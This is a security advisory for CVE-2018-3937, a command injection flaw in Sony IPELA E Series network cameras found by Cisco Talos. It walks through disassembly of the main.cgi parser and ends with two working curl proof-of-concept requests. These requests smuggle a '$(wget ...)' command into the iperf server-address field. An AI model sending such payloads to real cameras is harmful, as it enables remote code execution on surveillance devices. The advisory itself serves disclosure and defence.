CVE-2018-3937
An exploitable command injection vulnerability exists in the measurementBitrateExec functionality of Sony IPELA E Series Network Camera. A specially crafted GET request can cause arbitrary commands to be executed. An attacker can send an HTTP request to trigger this vulnerability.
Sony IPELA E series G5 firmware 1.87.00
9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
Sony IPELA Cameras are network facing cameras used for monitoring and surveillance.
In order to measure network performance, the camera leverages iperf
. While building the iperf
command, a specific payload can be sent to the main.cgi
in order to turn on performance measuring for UDP or TCP traffic:
measurement=bitrate,client,8.8.8.8,udp,123
measurement=bitrate,client,8.8.8.8,tcp,123
This string is parsed by main.cgi
by finding the client
substring and splitting at the comma:
0x0000aa48 0400a0e1 mov r0, r4 ; Input String
0x0000aa4c cc159fe5 ldr r1, [pc, 0x5cc] ; [0xb020:4]=0xd298 str.client
0x0000aa50 0620a0e3 mov r2, 6
0x0000aa54 a9fdffeb bl sym.imp.strncasecmp
0x0000aa58 000050e3 cmp r0, 0
0x0000aa5c acffff1a bne 0xa914
0x0000aa60 0400a0e1 mov r0, r4
0x0000aa64 0710a0e1 mov r1, r7
0x0000aa68 2c20a0e3 mov r2, 0x2c ; ','
0x0000aa6c c4fdffeb bl sym.g5::libcgi::LibCGI::split_element
Subsequently, parsing the server address is done by using find
to locate the next comma and extracting the string between the comma after client
.
0x0000aa98 0400a0e1 mov r0, r4
0x0000aa9c 0c3086e2 add r3, r6, 0xc
0x0000aaa0 94308de5 str r3, [sp, 0x94]
0x0000aaa4 7c159fe5 ldr r1, [pc, 0x57c] ; [0xb028:4]=0xd2a0 ","
0x0000aaa8 0020a0e3 mov r2, 0
0x0000aaac 0130a0e3 mov r3, 1
0x0000aab0 71fdffeb bl sym.std::string::find ; Find the comma after the server address
0x0000aab4 010070e3 cmn r0, 1
0x0000aab8 0040a0e1 mov r4, r0
0x0000aabc 3e00000a beq 0xabbc
0x0000aac0 90508de2 add r5, sp, 0x90
0x0000aac4 0500a0e1 mov r0, r5
0x0000aac8 98109de5 ldr r1, [sp, 0x98]
0x0000aacc a6208de2 add r2, sp, 0xa6
0x0000aad0 7efdffeb bl sym.std::basic_string_char_std::char_traits_char__std::allocator_char__::basic_string
0x0000aad4 0510a0e1 mov r1, r5
0x0000aad8 0430a0e1 mov r3, r4
0x0000aadc 94008de2 add r0, sp, 0x94
0x0000aae0 0020a0e3 mov r2, 0
0x0000aae4 73fdffeb bl sym.std::string::append
The above parsing results in the following commands:
UDP:
sh -c /usr/local/bin/iperf -c 8.8.8.8 -u -b 123K -x CD > /dev/null &
TCP:
/usr/local/bin/iperf -c 8.8.8.8 -F /tmp/MeasurementBitrateData -n 1 > /dev/null &
While parsing the input measurement string, there isn’t a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system
. Knowing this, an attacker can execute arbitrary commands in the position of the server address.
UDP:
curl --data "measurement=bitrate,client,1.2.3.4\$(wget http://address),udp,123" http://camera-address/command/main.cgi
TCP:
curl --data "measurement=bitrate,client,1.2.3.4\$(wget http://address),tcp,123" http://camera-address/command/main.cgi
2018-06-04 - Vendor disclosure
2018-07-19 - Vendor patched
2018-07-20 - Public release
Discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos.